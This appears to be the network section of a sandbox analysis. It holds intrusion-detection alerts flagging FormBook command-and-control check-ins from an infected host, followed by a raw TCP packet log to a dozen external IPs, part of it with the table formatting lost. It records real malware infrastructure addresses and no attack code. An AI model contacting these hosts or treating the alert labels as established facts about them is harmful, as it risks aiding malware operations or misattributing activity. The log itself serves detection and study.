| 2024-12-05T09:43:27.768718+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.8 | 49708 | 81.2.196.19 | 80 | TCP |
| 2024-12-05T09:43:53.418925+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.8 | 49712 | 103.249.106.91 | 80 | TCP |
| 2024-12-05T09:44:08.368003+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.8 | 49717 | 13.248.169.48 | 80 | TCP |
| 2024-12-05T09:44:23.579928+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.8 | 49721 | 195.110.124.133 | 80 | TCP |
| 2024-12-05T09:44:38.396713+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.8 | 49725 | 209.74.77.107 | 80 | TCP |
| 2024-12-05T09:44:53.167690+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.8 | 49729 | 84.32.84.32 | 80 | TCP |
| 2024-12-05T09:45:08.519235+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.8 | 49733 | 154.88.22.105 | 80 | TCP |
| 2024-12-05T09:45:23.962628+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.8 | 49737 | 85.159.66.93 | 80 | TCP |
| 2024-12-05T09:45:38.915975+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.8 | 49741 | 199.59.243.227 | 80 | TCP |
| 2024-12-05T09:45:53.979627+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.8 | 49745 | 91.226.30.3 | 80 | TCP |
| 2024-12-05T09:46:08.717861+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.8 | 49749 | 13.248.169.48 | 80 | TCP |
| 2024-12-05T09:46:23.882892+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.8 | 49753 | 185.27.134.144 | 80 | TCP |
| 2024-12-05T09:46:39.481719+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.8 | 49757 | 85.159.66.93 | 80 | TCP |
| 2024-12-05T09:46:54.675852+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.8 | 49761 | 154.23.184.207 | 80 | TCP |
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| Dec 5, 2024 09:43:26.355663061 CET | 49708 | 80 | 192.168.2.8 | 81.2.196.19 |
| Dec 5, 2024 09:43:26.475475073 CET | 80 | 49708 | 81.2.196.19 | 192.168.2.8 |
| Dec 5, 2024 09:43:26.475711107 CET | 49708 | 80 | 192.168.2.8 | 81.2.196.19 |
| Dec 5, 2024 09:43:26.486388922 CET | 49708 | 80 | 192.168.2.8 | 81.2.196.19 |
| Dec 5, 2024 09:43:26.606167078 CET | 80 | 49708 | 81.2.196.19 | 192.168.2.8 |
| Dec 5, 2024 09:43:27.768527031 CET | 80 | 49708 | 81.2.196.19 | 192.168.2.8 |
| Dec 5, 2024 09:43:27.768580914 CET | 80 | 49708 | 81.2.196.19 | 192.168.2.8 |
| Dec 5, 2024 09:43:27.768718004 CET | 49708 | 80 | 192.168.2.8 | 81.2.196.19 |
| Dec 5, 2024 09:43:27.771792889 CET | 49708 | 80 | 192.168.2.8 | 81.2.196.19 |
| Dec 5, 2024 09:43:27.891601086 CET | 80 | 49708 | 81.2.196.19 | 192.168.2.8 |
| Dec 5, 2024 09:43:43.693286896 CET | 49709 | 80 | 192.168.2.8 | 103.249.106.91 |
| Dec 5, 2024 09:43:43.813318968 CET | 80 | 49709 | 103.249.106.91 | 192.168.2.8 |
| Dec 5, 2024 09:43:43.813437939 CET | 49709 | 80 | 192.168.2.8 | 103.249.106.91 |
| Dec 5, 2024 09:43:43.860748053 CET | 49709 | 80 | 192.168.2.8 | 103.249.106.91 |
| Dec 5, 2024 09:43:43.980715990 CET | 80 | 49709 | 103.249.106.91 | 192.168.2.8 |
| Dec 5, 2024 09:43:45.332259893 CET | 80 | 49709 | 103.249.106.91 | 192.168.2.8 |
| Dec 5, 2024 09:43:45.332403898 CET | 80 | 49709 | 103.249.106.91 | 192.168.2.8 |
| Dec 5, 2024 09:43:45.332498074 CET | 49709 | 80 | 192.168.2.8 | 103.249.106.91 |
| Dec 5, 2024 09:43:45.366667986 CET | 49709 | 80 | 192.168.2.8 | 103.249.106.91 |
| Dec 5, 2024 09:43:46.451616049 CET | 49710 | 80 | 192.168.2.8 | 103.249.106.91 |
| Dec 5, 2024 09:43:46.572009087 CET | 80 | 49710 | 103.249.106.91 | 192.168.2.8 |
| Dec 5, 2024 09:43:46.572135925 CET | 49710 | 80 | 192.168.2.8 | 103.249.106.91 |
| Dec 5, 2024 09:43:46.595088005 CET | 49710 | 80 | 192.168.2.8 | 103.249.106.91 |
| Dec 5, 2024 09:43:46.714920044 CET | 80 | 49710 | 103.249.106.91 | 192.168.2.8 |
| Dec 5, 2024 09:43:48.095791101 CET | 80 | 49710 | 103.249.106.91 | 192.168.2.8 |
| Dec 5, 2024 09:43:48.095808029 CET | 80 | 49710 | 103.249.106.91 | 192.168.2.8 |
| Dec 5, 2024 09:43:48.096131086 CET | 49710 | 80 | 192.168.2.8 | 103.249.106.91 |
| Dec 5, 2024 09:43:48.100990057 CET | 49710 | 80 | 192.168.2.8 | 103.249.106.91 |
| Dec 5, 2024 09:43:49.119926929 CET | 49711 | 80 | 192.168.2.8 | 103.249.106.91 |
| Dec 5, 2024 09:43:49.239769936 CET | 80 | 49711 | 103.249.106.91 | 192.168.2.8 |
| Dec 5, 2024 09:43:49.239901066 CET | 49711 | 80 | 192.168.2.8 | 103.249.106.91 |
| Dec 5, 2024 09:43:49.255536079 CET | 49711 | 80 | 192.168.2.8 | 103.249.106.91 |
| Dec 5, 2024 09:43:49.403062105 CET | 80 | 49711 | 103.249.106.91 | 192.168.2.8 |
| Dec 5, 2024 09:43:49.403074980 CET | 80 | 49711 | 103.249.106.91 | 192.168.2.8 |
| Dec 5, 2024 09:43:50.757087946 CET | 49711 | 80 | 192.168.2.8 | 103.249.106.91 |
| Dec 5, 2024 09:43:50.877268076 CET | 80 | 49711 | 103.249.106.91 | 192.168.2.8 |
| Dec 5, 2024 09:43:50.877366066 CET | 49711 | 80 | 192.168.2.8 | 103.249.106.91 |
| Dec 5, 2024 09:43:51.776277065 CET | 49712 | 80 | 192.168.2.8 | 103.249.106.91 |
| Dec 5, 2024 09:43:51.896044016 CET | 80 | 49712 | 103.249.106.91 | 192.168.2.8 |
| Dec 5, 2024 09:43:51.896153927 CET | 49712 | 80 | 192.168.2.8 | 103.249.106.91 |
| Dec 5, 2024 09:43:51.906380892 CET | 49712 | 80 | 192.168.2.8 | 103.249.106.91 |
| Dec 5, 2024 09:43:52.026213884 CET | 80 | 49712 | 103.249.106.91 | 192.168.2.8 |
| Dec 5, 2024 09:43:53.418690920 CET | 80 | 49712 | 103.249.106.91 | 192.168.2.8 |
| Dec 5, 2024 09:43:53.418773890 CET | 80 | 49712 | 103.249.106.91 | 192.168.2.8 |
| Dec 5, 2024 09:43:53.418925047 CET | 49712 | 80 | 192.168.2.8 | 103.249.106.91 |
| Dec 5, 2024 09:43:53.421638012 CET | 49712 | 80 | 192.168.2.8 | 103.249.106.91 |
| Dec 5, 2024 09:43:53.541441917 CET | 80 | 49712 | 103.249.106.91 | 192.168.2.8 |
| Dec 5, 2024 09:43:59.147979975 CET | 49714 | 80 | 192.168.2.8 | 13.248.169.48 |
| Dec 5, 2024 09:43:59.267859936 CET | 80 | 49714 | 13.248.169.48 | 192.168.2.8 |
| Dec 5, 2024 09:43:59.267936945 CET | 49714 | 80 | 192.168.2.8 | 13.248.169.48 |
| Dec 5, 2024 09:43:59.283620119 CET | 49714 | 80 | 192.168.2.8 | 13.248.169.48 |
| Dec 5, 2024 09:43:59.403367043 CET | 80 | 49714 | 13.248.169.48 | 192.168.2.8 |
| Dec 5, 2024 09:44:00.371089935 CET | 80 | 49714 | 13.248.169.48 | 192.168.2.8 |
| Dec 5, 2024 09:44:00.371181011 CET | 49714 | 80 | 192.168.2.8 | 13.248.169.48 |
| Dec 5, 2024 09:44:00.788448095 CET | 49714 | 80 | 192.168.2.8 | 13.248.169.48 |
| Dec 5, 2024 09:44:00.909460068 CET | 80 | 49714 | 13.248.169.48 | 192.168.2.8 |
| Dec 5, 2024 09:44:01.814019918 CET | 49715 | 80 | 192.168.2.8 | 13.248.169.48 |
| Dec 5, 2024 09:44:01.933870077 CET | 80 | 49715 | 13.248.169.48 | 192.168.2.8 |
| Dec 5, 2024 09:44:01.934032917 CET | 49715 | 80 | 192.168.2.8 | 13.248.169.48 |
| Dec 5, 2024 09:44:01.950649977 CET | 49715 | 80 | 192.168.2.8 | 13.248.169.48 |
| Dec 5, 2024 09:44:02.070560932 CET | 80 | 49715 | 13.248.169.48 | 192.168.2.8 |
| Dec 5, 2024 09:44:03.031696081 CET | 80 | 49715 | 13.248.169.48 | 192.168.2.8 |
| Dec 5, 2024 09:44:03.031770945 CET | 49715 | 80 | 192.168.2.8 | 13.248.169.48 |
| Dec 5, 2024 09:44:03.460660934 CET | 49715 | 80 | 192.168.2.8 | 13.248.169.48 |
| Dec 5, 2024 09:44:03.580354929 CET | 80 | 49715 | 13.248.169.48 | 192.168.2.8 |
| Dec 5, 2024 09:44:04.479528904 CET | 49716 | 80 | 192.168.2.8 | 13.248.169.48 |
| Dec 5, 2024 09:44:04.599391937 CET | 80 | 49716 | 13.248.169.48 | 192.168.2.8 |
| Dec 5, 2024 09:44:04.599541903 CET | 49716 | 80 | 192.168.2.8 | 13.248.169.48 |
| Dec 5, 2024 09:44:04.614829063 CET | 49716 | 80 | 192.168.2.8 | 13.248.169.48 |
| Dec 5, 2024 09:44:04.734668970 CET | 80 | 49716 | 13.248.169.48 | 192.168.2.8 |
| Dec 5, 2024 09:44:04.734684944 CET | 80 | 49716 | 13.248.169.48 | 192.168.2.8 |
| Dec 5, 2024 09:44:05.697489023 CET | 80 | 49716 | 13.248.169.48 | 192.168.2.8 |
| Dec 5, 2024 09:44:05.700297117 CET | 49716 | 80 | 192.168.2.8 | 13.248.169.48 |
| Dec 5, 2024 09:44:06.116702080 CET | 49716 | 80 | 192.168.2.8 | 13.248.169.48 |
| Dec 5, 2024 09:44:06.236558914 CET | 80 | 49716 | 13.248.169.48 | 192.168.2.8 |
| Dec 5, 2024 09:44:07.144720078 CET | 49717 | 80 | 192.168.2.8 | 13.248.169.48 |
| Dec 5, 2024 09:44:07.264529943 CET | 80 | 49717 | 13.248.169.48 | 192.168.2.8 |
| Dec 5, 2024 09:44:07.264688969 CET | 49717 | 80 | 192.168.2.8 | 13.248.169.48 |
| Dec 5, 2024 09:44:07.274946928 CET | 49717 | 80 | 192.168.2.8 | 13.248.169.48 |
| Dec 5, 2024 09:44:07.394690037 CET | 80 | 49717 | 13.248.169.48 | 192.168.2.8 |
| Dec 5, 2024 09:44:08.367788076 CET | 80 | 49717 | 13.248.169.48 | 192.168.2.8 |
| Dec 5, 2024 09:44:08.367913008 CET | 80 | 49717 | 13.248.169.48 | 192.168.2.8 |
| Dec 5, 2024 09:44:08.368002892 CET | 49717 | 80 | 192.168.2.8 | 13.248.169.48 |
| Dec 5, 2024 09:44:08.370749950 CET | 49717 | 80 | 192.168.2.8 | 13.248.169.48 |
| Dec 5, 2024 09:44:08.490629911 CET | 80 | 49717 | 13.248.169.48 | 192.168.2.8 |
| Dec 5, 2024 09:44:14.139519930 CET | 49718 | 80 | 192.168.2.8 | 195.110.124.133 |
| Dec 5, 2024 09:44:14.259577036 CET | 80 | 49718 | 195.110.124.133 | 192.168.2.8 |
| Dec 5, 2024 09:44:14.259691954 CET | 49718 | 80 | 192.168.2.8 | 195.110.124.133 |
| Dec 5, 2024 09:44:14.284224987 CET | 49718 | 80 | 192.168.2.8 | 195.110.124.133 |
| Dec 5, 2024 09:44:14.404027939 CET | 80 | 49718 | 195.110.124.133 | 192.168.2.8 |
| Dec 5, 2024 09:44:15.567703962 CET | 80 | 49718 | 195.110.124.133 | 192.168.2.8 |
| Dec 5, 2024 09:44:15.567941904 CET | 80 | 49718 | 195.110.124.133 | 192.168.2.8 |
| Dec 5, 2024 09:44:15.568028927 CET | 49718 | 80 | 192.168.2.8 | 195.110.124.133 |
| Dec 5, 2024 09:44:15.788552999 CET | 49718 | 80 | 192.168.2.8 | 195.110.124.133 |
| Dec 5, 2024 09:44:16.814081907 CET | 49719 | 80 | 192.168.2.8 | 195.110.124.133 |
| Dec 5, 2024 09:44:16.933959007 CET | 80 | 49719 | 195.110.124.133 | 192.168.2.8 |
| Dec 5, 2024 09:44:16.934108973 CET | 49719 | 80 | 192.168.2.8 | 195.110.124.133 |
| Dec 5, 2024 09:44:16.955539942 CET | 49719 | 80 | 192.168.2.8 | 195.110.124.133 |
| Dec 5, 2024 09:44:17.075462103 CET | 80 | 49719 | 195.110.124.133 | 192.168.2.8 |
| Dec 5, 2024 09:44:18.244738102 CET | 80 | 49719 | 195.110.124.133 | 192.168.2.8 |
| Dec 5, 2024 09:44:18.245094061 CET | 80 | 49719 | 195.110.124.133 | 192.168.2.8 |
| Dec 5, 2024 09:44:18.245151997 CET | 49719 | 80 | 192.168.2.8 | 195.110.124.133 |
| Dec 5, 2024 09:44:18.460371971 CET | 49719 | 80 | 192.168.2.8 | 195.110.124.133 |
| Dec 5, 2024 09:44:19.479538918 CET | 49720 | 80 | 192.168.2.8 | 195.110.124.133 |
| Dec 5, 2024 09:44:19.600256920 CET | 80 | 49720 | 195.110.124.133 | 192.168.2.8 |
| Dec 5, 2024 09:44:19.600517035 CET | 49720 | 80 | 192.168.2.8 | 195.110.124.133 |
| Dec 5, 2024 09:44:19.623923063 CET | 49720 | 80 | 192.168.2.8 | 195.110.124.133 |
| Dec 5, 2024 09:44:19.743901968 CET | 80 | 49720 | 195.110.124.133 | 192.168.2.8 |
| Dec 5, 2024 09:44:19.743921041 CET | 80 | 49720 | 195.110.124.133 | 192.168.2.8 |
| Dec 5, 2024 09:44:21.019366980 CET | 80 | 49720 | 195.110.124.133 | 192.168.2.8 |
| Dec 5, 2024 09:44:21.019788980 CET | 80 | 49720 | 195.110.124.133 | 192.168.2.8 |
| Dec 5, 2024 09:44:21.019844055 CET | 49720 | 80 | 192.168.2.8 | 195.110.124.133 |
| Dec 5, 2024 09:44:21.133482933 CET | 49720 | 80 | 192.168.2.8 | 195.110.124.133 |
| Dec 5, 2024 09:44:22.151458025 CET | 49721 | 80 | 192.168.2.8 | 195.110.124.133 |
| Dec 5, 2024 09:44:22.271254063 CET | 80 | 49721 | 195.110.124.133 | 192.168.2.8 |
| Dec 5, 2024 09:44:22.271332026 CET | 49721 | 80 | 192.168.2.8 | 195.110.124.133 |
| Dec 5, 2024 09:44:22.282315969 CET | 49721 | 80 | 192.168.2.8 | 195.110.124.133 |
| Dec 5, 2024 09:44:22.401998043 CET | 80 | 49721 | 195.110.124.133 | 192.168.2.8 |
| Dec 5, 2024 09:44:23.579639912 CET | 80 | 49721 | 195.110.124.133 | 192.168.2.8 |
| Dec 5, 2024 09:44:23.579852104 CET | 80 | 49721 | 195.110.124.133 | 192.168.2.8 |
| Dec 5, 2024 09:44:23.579927921 CET | 49721 | 80 | 192.168.2.8 | 195.110.124.133 |
| Dec 5, 2024 09:44:23.582647085 CET | 49721 | 80 | 192.168.2.8 | 195.110.124.133 |
| Dec 5, 2024 09:44:23.702343941 CET | 80 | 49721 | 195.110.124.133 | 192.168.2.8 |
| Dec 5, 2024 09:44:29.012798071 CET | 49722 | 80 | 192.168.2.8 | 209.74.77.107 |
| Dec 5, 2024 09:44:29.132561922 CET | 80 | 49722 | 209.74.77.107 | 192.168.2.8 |
| Dec 5, 2024 09:44:29.132673979 CET | 49722 | 80 | 192.168.2.8 | 209.74.77.107 |
| Dec 5, 2024 09:44:29.149302959 CET | 49722 | 80 | 192.168.2.8 | 209.74.77.107 |
| Dec 5, 2024 09:44:29.269021034 CET | 80 | 49722 | 209.74.77.107 | 192.168.2.8 |
| Dec 5, 2024 09:44:30.374099970 CET | 80 | 49722 | 209.74.77.107 | 192.168.2.8 |
| Dec 5, 2024 09:44:30.374228954 CET | 80 | 49722 | 209.74.77.107 | 192.168.2.8 |
| Dec 5, 2024 09:44:30.374278069 CET | 49722 | 80 | 192.168.2.8 | 209.74.77.107 |
| Dec 5, 2024 09:44:30.663481951 CET | 49722 | 80 | 192.168.2.8 | 209.74.77.107 |
| Dec 5, 2024 09:44:31.682835102 CET | 49723 | 80 | 192.168.2.8 | 209.74.77.107 |
| Dec 5, 2024 09:44:31.802752018 CET | 80 | 49723 | 209.74.77.107 | 192.168.2.8 |
| Dec 5, 2024 09:44:31.806427002 CET | 49723 | 80 | 192.168.2.8 | 209.74.77.107 |
| Dec 5, 2024 09:44:31.821647882 CET | 49723 | 80 | 192.168.2.8 | 209.74.77.107 |
| Dec 5, 2024 09:44:31.941421986 CET | 80 | 49723 | 209.74.77.107 | 192.168.2.8 |
| Dec 5, 2024 09:44:33.044850111 CET | 80 | 49723 | 209.74.77.107 | 192.168.2.8 |
| Dec 5, 2024 09:44:33.044879913 CET | 80 | 49723 | 209.74.77.107 | 192.168.2.8 |
| Dec 5, 2024 09:44:33.046377897 CET | 49723 | 80 | 192.168.2.8 | 209.74.77.107 |
| Dec 5, 2024 09:44:33.338285923 CET | 49723 | 80 | 192.168.2.8 | 209.74.77.107 |
| Dec 5, 2024 09:44:34.354648113 CET | 49724 | 80 | 192.168.2.8 | 209.74.77.107 |
| Dec 5, 2024 09:44:34.475380898 CET | 80 | 49724 | 209.74.77.107 | 192.168.2.8 |
| Dec 5, 2024 09:44:34.475483894 CET | 49724 | 80 | 192.168.2.8 | 209.74.77.107 |
| Dec 5, 2024 09:44:34.491868019 CET | 49724 | 80 | 192.168.2.8 | 209.74.77.107 |
| Dec 5, 2024 09:44:34.611713886 CET | 80 | 49724 | 209.74.77.107 | 192.168.2.8 |
| Dec 5, 2024 09:44:34.611805916 CET | 80 | 49724 | 209.74.77.107 | 192.168.2.8 |
| Dec 5, 2024 09:44:35.795859098 CET | 80 | 49724 | 209.74.77.107 | 192.168.2.8 |
| Dec 5, 2024 09:44:35.795972109 CET | 80 | 49724 | 209.74.77.107 | 192.168.2.8 |
| Dec 5, 2024 09:44:35.796072006 CET | 49724 | 80 | 192.168.2.8 | 209.74.77.107 |
| Dec 5, 2024 09:44:36.015460968 CET | 49724 | 80 | 192.168.2.8 | 209.74.77.107 |
| Dec 5, 2024 09:44:37.030878067 CET | 49725 | 80 | 192.168.2.8 | 209.74.77.107 |
| Dec 5, 2024 09:44:37.150639057 CET | 80 | 49725 | 209.74.77.107 | 192.168.2.8 |
| Dec 5, 2024 09:44:37.158415079 CET | 49725 | 80 | 192.168.2.8 | 209.74.77.107 |
| Dec 5, 2024 09:44:37.166523933 CET | 49725 | 80 | 192.168.2.8 | 209.74.77.107 |
| Dec 5, 2024 09:44:37.286308050 CET | 80 | 49725 | 209.74.77.107 | 192.168.2.8 |
| Dec 5, 2024 09:44:38.396351099 CET | 80 | 49725 | 209.74.77.107 | 192.168.2.8 |
| Dec 5, 2024 09:44:38.396667004 CET | 80 | 49725 | 209.74.77.107 | 192.168.2.8 |
| Dec 5, 2024 09:44:38.396713018 CET | 49725 | 80 | 192.168.2.8 | 209.74.77.107 |
| Dec 5, 2024 09:44:38.401261091 CET | 49725 | 80 | 192.168.2.8 | 209.74.77.107 |
| Dec 5, 2024 09:44:38.523139000 CET | 80 | 49725 | 209.74.77.107 | 192.168.2.8 |
| Dec 5, 2024 09:44:43.942353964 CET | 49726 | 80 | 192.168.2.8 | 84.32.84.32 |
| Dec 5, 2024 09:44:44.062194109 CET | 80 | 49726 | 84.32.84.32 | 192.168.2.8 |
| Dec 5, 2024 09:44:44.062284946 CET | 49726 | 80 | 192.168.2.8 | 84.32.84.32 |
| Dec 5, 2024 09:44:44.084762096 CET | 49726 | 80 | 192.168.2.8 | 84.32.84.32 |
| Dec 5, 2024 09:44:44.204956055 CET | 80 | 49726 | 84.32.84.32 | 192.168.2.8 |
| Dec 5, 2024 09:44:45.160818100 CET | 80 | 49726 | 84.32.84.32 | 192.168.2.8 |
| Dec 5, 2024 09:44:45.161015987 CET | 49726 | 80 | 192.168.2.8 | 84.32.84.32 |
| Dec 5, 2024 09:44:45.601111889 CET | 49726 | 80 | 192.168.2.8 | 84.32.84.32 |
| Dec 5, 2024 09:44:45.721128941 CET | 80 | 49726 | 84.32.84.32 | 192.168.2.8 |
| Dec 5, 2024 09:44:46.620414972 CET | 49727 | 80 | 192.168.2.8 | 84.32.84.32 |
| Dec 5, 2024 09:44:46.740130901 CET | 80 | 49727 | 84.32.84.32 | 192.168.2.8 |
| Dec 5, 2024 09:44:46.740221977 CET | 49727 | 80 | 192.168.2.8 | 84.32.84.32 |
| Dec 5, 2024 09:44:46.756191015 CET | 49727 | 80 | 192.168.2.8 | 84.32.84.32 |
| Dec 5, 2024 09:44:46.875930071 CET | 80 | 49727 | 84.32.84.32 | 192.168.2.8 |
| Dec 5, 2024 09:44:47.838172913 CET | 80 | 49727 | 84.32.84.32 | 192.168.2.8 |
| Dec 5, 2024 09:44:47.838422060 CET | 49727 | 80 | 192.168.2.8 | 84.32.84.32 |
| Dec 5, 2024 09:44:48.257536888 CET | 49727 | 80 | 192.168.2.8 | 84.32.84.32 |
| Dec 5, 2024 09:44:48.377257109 CET | 80 | 49727 | 84.32.84.32 | 192.168.2.8 |
| Dec 5, 2024 09:44:49.276645899 CET | 49728 | 80 | 192.168.2.8 | 84.32.84.32 |
| Dec 5, 2024 09:44:49.396522045 CET | 80 | 49728 | 84.32.84.32 | 192.168.2.8 |
| Dec 5, 2024 09:44:49.398475885 CET | 49728 | 80 | 192.168.2.8 | 84.32.84.32 |
| Dec 5, 2024 09:44:49.414539099 CET | 49728 | 80 | 192.168.2.8 | 84.32.84.32 |
| Dec 5, 2024 09:44:49.534375906 CET | 80 | 49728 | 84.32.84.32 | 192.168.2.8 |
| Dec 5, 2024 09:44:49.534440041 CET | 80 | 49728 | 84.32.84.32 | 192.168.2.8 |
| Dec 5, 2024 09:44:50.495615005 CET | 80 | 49728 | 84.32.84.32 | 192.168.2.8 |
| Dec 5, 2024 09:44:50.495699883 CET | 49728 | 80 | 192.168.2.8 | 84.32.84.32 |
| Dec 5, 2024 09:44:50.930186033 CET | 49728 | 80 | 192.168.2.8 | 84.32.84.32 |
| Dec 5, 2024 09:44:51.049916029 CET | 80 | 49728 | 84.32.84.32 | 192.168.2.8 |
| Dec 5, 2024 09:44:51.950397015 CET | 49729 | 80 | 192.168.2.8 | 84.32.84.32 |
| Dec 5, 2024 09:44:52.070287943 CET | 80 | 49729 | 84.32.84.32 | 192.168.2.8 |
| Dec 5, 2024 09:44:52.070391893 CET | 49729 | 80 | 192.168.2.8 | 84.32.84.32 |
| Dec 5, 2024 09:44:52.082525015 CET | 49729 | 80 | 192.168.2.8 | 84.32.84.32 |
| Dec 5, 2024 09:44:52.202332020 CET | 80 | 49729 | 84.32.84.32 | 192.168.2.8 |
| Dec 5, 2024 09:44:53.167207003 CET | 80 | 49729 | 84.32.84.32 | 192.168.2.8 |
| Dec 5, 2024 09:44:53.167243004 CET | 80 | 49729 | 84.32.84.32 | 192.168.2.8 |
| Dec 5, 2024 09:44:53.167256117 CET | 80 | 49729 | 84.32.84.32 | 192.168.2.8 |
| Dec 5, 2024 09:44:53.167423010 CET | 80 | 49729 | 84.32.84.32 | 192.168.2.8 |
| Dec 5, 2024 09:44:53.167434931 CET | 80 | 49729 | 84.32.84.32 | 192.168.2.8 |
| Dec 5, 2024 09:44:53.167452097 CET | 80 | 49729 | 84.32.84.32 | 192.168.2.8 |
| Dec 5, 2024 09:44:53.167464018 CET | 80 | 49729 | 84.32.84.32 | 192.168.2.8 |
| Dec 5, 2024 09:44:53.167475939 CET | 80 | 49729 | 84.32.84.32 | 192.168.2.8 |
| Dec 5, 2024 09:44:53.167690039 CET | 49729 | 80 | 192.168.2.8 | 84.32.84.32 |
| Dec 5, 2024 09:44:53.167690039 CET | 49729 | 80 | 192.168.2.8 | 84.32.84.32 |
| Dec 5, 2024 09:44:53.167737961 CET | 80 | 49729 | 84.32.84.32 | 192.168.2.8 |
| Dec 5, 2024 09:44:53.167747021 CET | 80 | 49729 | 84.32.84.32 | 192.168.2.8 |
| Dec 5, 2024 09:44:53.173723936 CET | 49729 | 80 | 192.168.2.8 | 84.32.84.32 |
| Dec 5, 2024 09:44:53.173723936 CET | 49729 | 80 | 192.168.2.8 | 84.32.84.32 |
| Dec 5, 2024 09:44:53.294743061 CET | 80 | 49729 | 84.32.84.32 | 192.168.2.8 |
| Dec 5, 2024 09:44:58.815206051 CET | 49730 | 80 | 192.168.2.8 | 154.88.22.105 |
| Dec 5, 2024 09:44:58.935090065 CET | 80 | 49730 | 154.88.22.105 | 192.168.2.8 |
| Dec 5, 2024 09:44:58.935348034 CET | 49730 | 80 | 192.168.2.8 | 154.88.22.105 |
| Dec 5, 2024 09:44:58.952228069 CET | 49730 | 80 | 192.168.2.8 | 154.88.22.105 |
| Dec 5, 2024 09:44:59.072184086 CET | 80 | 49730 | 154.88.22.105 | 192.168.2.8 |
| Dec 5, 2024 09:45:00.460521936 CET | 49730 | 80 | 192.168.2.8 | 154.88.22.105 |
| Dec 5, 2024 09:45:00.463910103 CET | 80 | 49730 | 154.88.22.105 | 192.168.2.8 |
| Dec 5, 2024 09:45:00.464013100 CET | 49730 | 80 | 192.168.2.8 | 154.88.22.105 |
| Dec 5, 2024 09:45:00.464169979 CET | 80 | 49730 | 154.88.22.105 | 192.168.2.8 |
| Dec 5, 2024 09:45:00.464253902 CET | 49730 | 80 | 192.168.2.8 | 154.88.22.105 |
| Dec 5, 2024 09:45:00.580367088 CET | 80 | 49730 | 154.88.22.105 | 192.168.2.8 |
| Dec 5, 2024 09:45:00.580468893 CET | 49730 | 80 | 192.168.2.8 | 154.88.22.105 |
| Dec 5, 2024 09:45:01.479535103 CET | 49731 | 80 | 192.168.2.8 | 154.88.22.105 |
| Dec 5, 2024 09:45:01.599420071 CET | 80 | 49731 | 154.88.22.105 | 192.168.2.8 |
| Dec 5, 2024 09:45:01.602696896 CET | 49731 | 80 | 192.168.2.8 | 154.88.22.105 |
| Dec 5, 2024 09:45:01.618776083 CET | 49731 | 80 | 192.168.2.8 | 154.88.22.105 |
| Dec 5, 2024 09:45:01.738444090 CET | 80 | 49731 | 154.88.22.105 | 192.168.2.8 |
| Dec 5, 2024 09:45:03.128293037 CET | 80 | 49731 | 154.88.22.105 | 192.168.2.8 |
| Dec 5, 2024 09:45:03.128314972 CET | 80 | 49731 | 154.88.22.105 | 192.168.2.8 |
| Dec 5, 2024 09:45:03.130517960 CET | 49731 | 80 | 192.168.2.8 | 154.88.22.105 |
| Dec 5, 2024 09:45:03.134671926 CET | 49731 | 80 | 192.168.2.8 | 154.88.22.105 |
| Dec 5, 2024 09:45:04.174429893 CET | 49732 | 80 | 192.168.2.8 | 154.88.22.105 |
| Dec 5, 2024 09:45:04.294143915 CET | 80 | 49732 | 154.88.22.105 | 192.168.2.8 |
                                                                    Dec 5, 2024 09:45:04.294290066 CET4973280192.168.2.8154.88.22.105
                                                                    Dec 5, 2024 09:45:04.325186014 CET4973280192.168.2.8154.88.22.105
                                                                    Dec 5, 2024 09:45:04.444947004 CET8049732154.88.22.105192.168.2.8
                                                                    Dec 5, 2024 09:45:04.444972992 CET8049732154.88.22.105192.168.2.8
                                                                    Dec 5, 2024 09:45:05.835633993 CET4973280192.168.2.8154.88.22.105
                                                                    Dec 5, 2024 09:45:05.955677032 CET8049732154.88.22.105192.168.2.8
                                                                    Dec 5, 2024 09:45:05.958647013 CET4973280192.168.2.8154.88.22.105
                                                                    Dec 5, 2024 09:45:06.862381935 CET4973380192.168.2.8154.88.22.105
                                                                    Dec 5, 2024 09:45:06.982322931 CET8049733154.88.22.105192.168.2.8
                                                                    Dec 5, 2024 09:45:06.982424974 CET4973380192.168.2.8154.88.22.105
                                                                    Dec 5, 2024 09:45:06.998460054 CET4973380192.168.2.8154.88.22.105
                                                                    Dec 5, 2024 09:45:07.118737936 CET8049733154.88.22.105192.168.2.8
                                                                    Dec 5, 2024 09:45:08.518945932 CET8049733154.88.22.105192.168.2.8
                                                                    Dec 5, 2024 09:45:08.519190073 CET8049733154.88.22.105192.168.2.8
                                                                    Dec 5, 2024 09:45:08.519234896 CET4973380192.168.2.8154.88.22.105
                                                                    Dec 5, 2024 09:45:08.522435904 CET4973380192.168.2.8154.88.22.105
                                                                    Dec 5, 2024 09:45:08.642138958 CET8049733154.88.22.105192.168.2.8
                                                                    Dec 5, 2024 09:45:14.515980959 CET4973480192.168.2.885.159.66.93
                                                                    Dec 5, 2024 09:45:14.635741949 CET804973485.159.66.93192.168.2.8
                                                                    Dec 5, 2024 09:45:14.635828018 CET4973480192.168.2.885.159.66.93
                                                                    Dec 5, 2024 09:45:14.655365944 CET4973480192.168.2.885.159.66.93
                                                                    Dec 5, 2024 09:45:14.776251078 CET804973485.159.66.93192.168.2.8
                                                                    Dec 5, 2024 09:45:16.163876057 CET4973480192.168.2.885.159.66.93
                                                                    Dec 5, 2024 09:45:16.284127951 CET804973485.159.66.93192.168.2.8
                                                                    Dec 5, 2024 09:45:16.284198046 CET4973480192.168.2.885.159.66.93
